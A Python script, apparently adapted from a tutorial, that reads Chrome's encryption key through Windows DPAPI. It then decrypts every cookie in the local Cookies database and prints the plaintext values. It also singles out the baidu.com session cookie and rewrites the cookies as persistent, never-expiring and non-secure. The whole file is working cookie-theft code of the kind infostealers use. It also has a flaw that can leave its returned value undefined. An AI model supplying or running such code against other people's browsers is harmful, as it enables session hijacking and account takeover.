import os import json import base64 import sqlite3 import shutil from datetime import datetime, timedelta import win32crypt # pip install pypiwin32 from Crypto.Cipher import AES # pip install pycryptodome def get_chrome_datetime(chromedate): """Return a `datetime.datetime` object from a chrome format datetime Since `chromedate` is formatted as the number of microseconds since January, 1601""" if chromedate != 86400000000 and chromedate: try: return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) except Exception as e: print(f"Error: {e}, chromedate: {chromedate}") return chromedate else: return "" def get_encryption_key(): local_state_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Local State") with open(local_state_path, "r", encoding="utf-8") as f: local_state = f.read() local_state = json.loads(local_state) # decode the encryption key from Base64 key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) # remove 'DPAPI' str key = key[5:] # return decrypted key that was originally encrypted # using a session key derived from current user's logon credentials # doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] def decrypt_data(data, key): try: # get the initialization vector iv = data[3:15] data = data[15:] # generate cipher cipher = AES.new(key, AES.MODE_GCM, iv) # decrypt password return cipher.decrypt(data)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(data, None, None, None, 0)[1]) except: # not supported return "" def main(): # local sqlite Chrome cookie database path db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "default", "Cookies") # copy the file to current directory # as the database will be locked if chrome is currently open filename = "Cookies.db" if not os.path.isfile(filename): # copy file when does not exist in the current directory shutil.copyfile(db_path, filename) # connect to the database db = sqlite3.connect(filename) cursor = db.cursor() # get the cookies from `cookies` table cursor.execute(""" SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value FROM cookies""") # you can also search by domain, e.g thepythoncode.com # cursor.execute(""" # SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value # FROM cookies # WHERE host_key like '%thepythoncode.com%'""") # get the AES key key = get_encryption_key() for host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value in cursor.fetchall(): if not value: decrypted_value = decrypt_data(encrypted_value, key) else: # already decrypted decrypted_value = value print(f""" Host: {host_key} Cookie name: {name} Cookie value (decrypted): {decrypted_value} Creation datetime (UTC): {get_chrome_datetime(creation_utc)} Last access datetime (UTC): {get_chrome_datetime(last_access_utc)} Expires datetime (UTC): {get_chrome_datetime(expires_utc)} =============================================================== """) #此处可以加判断,直接判断是否为你需要网站的cookie if host_key == "baidu.com": need_cookie = decrypted_value # update the cookies table with the decrypted value # and make session cookie persistent cursor.execute(""" UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, is_secure = 0 WHERE host_key = ? AND name = ?""", (decrypted_value, host_key, name)) # commit changes db.commit() # close connection db.close()
return need_cookie if __name__ == "__main__": main()